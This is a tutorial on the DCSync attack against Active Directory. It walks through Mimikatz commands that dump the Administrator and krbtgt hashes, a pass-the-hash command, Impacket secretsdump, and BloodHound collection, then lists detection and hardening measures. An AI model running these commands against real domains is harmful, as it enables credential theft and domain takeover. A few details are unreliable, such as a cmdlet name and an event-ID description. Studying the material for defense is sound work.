DCSync Attack

What is a DCSync Attack?
DCSync is a post-exploitation attack where an attacker pretends to be a Domain Controller (DC) and requests password hashes from Active Directory (AD) using replication privileges.

Why is DCSync Dangerous?
●    Allows stealing NTLM, AES, and Kerberos hashes from AD.

●    Can extract passwords of Domain Admins and KRBTGT accounts.

●    Enables attackers to perform Golden Ticket and Pass-the-Hash (PtH) attacks.

●    No need for code execution on the Domain Controller—can be done remotely.

________________________________________
 How Does a DCSync Attack Work? (Step-by-Step)
Step 1: Attacker Gains Domain Replication Rights
●    DCSync requires administrative privileges or replication permissions.

●    Typically, attackers compromise a Domain Admin, Enterprise Admin, or accounts with DS-Replication rights.

  Check If an Account Has Replication Rights (PowerView)
  Get-ADReplicationAccount -Domain example.com

  Finds accounts with DCSync privileges.
________________________________________
Step 2: Use Mimikatz to Request Hashes from AD
●    The attacker impersonates a Domain Controller and requests NTLM hashes from AD.

●    The LSA replication API responds with hashed credentials.

 Mimikatz Command to Perform DCSync Attack
 mimikatz.exe
 lsadump::dcsync /domain:example.com /user:Administrator

 Extracts NTLM hash of the Administrator account.
 Extract KRBTGT Account Hash (For Golden Ticket Attack)
 mimikatz.exe
 lsadump::dcsync /domain:example.com /user:krbtgt

 Steals the Kerberos Ticket Granting Ticket (TGT) account hash.
________________________________________
Step 3: Use the Stolen Hashes for Further Attacks
After getting NTLM hashes, the attacker can:
  Perform Pass-the-Hash (PtH) to authenticate as the stolen user.
  Perform Golden Ticket Attack using the KRBTGT hash.
  Perform Skeleton Key Attack to create a backdoor account.
  Use Stolen Hash for Pass-the-Hash Attack
mimikatz.exe
sekurlsa::pth /user:Administrator /domain:example.com /ntlm: /run:powershell.exe

 Logs in as Administrator using NTLM hash.
________________________________________

Tools Used for DCSync Attacks

________________________________________
 Example Commands for Each Tool
1. Check Replication Privileges with PowerView
    Get-ADReplicationAccount -Domain example.com

    Lists accounts that can run DCSync.
________________________________________
2. Perform DCSync Attack with Mimikatz
    lsadump::dcsync /domain:example.com /user:Administrator

    Steals Administrator’s NTLM hash.
________________________________________
3. Extract Password Hashes Remotely with Impacket (Linux)
   python3 secretsdump.py example.com/Administrator@DC_IP -hashes :

   Steals hashes from a remote Domain Controller.
________________________________________
4. Visualize AD Replication Permissions with BloodHound
Invoke-BloodHound -CollectionMethod ACL,DCOnly -OutputDirectory C:\Temp

 Finds accounts that have replication rights.
________________________________________
 How to Detect & Prevent DCSync Attacks?

Detection (Blue Team)

•  Monitor Event ID 4662 (Directory Services replication requests).
•  Monitor Event ID 4713 (Changes to replication privileges).
•  Use Sysmon to track suspicious LSASS access.
•  Alert when non-DC machines request replication.

Prevention (Security Hardening)

•   Limit DCSync privileges – only Domain Controllers should have replication rights.
•   Monitor and audit changes to group memberships (especially Administrators, Domain Admins, Enterprise Admins).
•   Enable LAPS (Local Administrator Password Solution) to prevent privilege escalation.
•   Use SIEM to detect abnormal replication requests.

________________________________________
 Summary
●    DCSync allows attackers to steal password hashes by impersonating a Domain Controller.

●    Requires admin or replication privileges.

●    Defenses include monitoring Event ID 4662, restricting replication rights, and using SIEM alerts.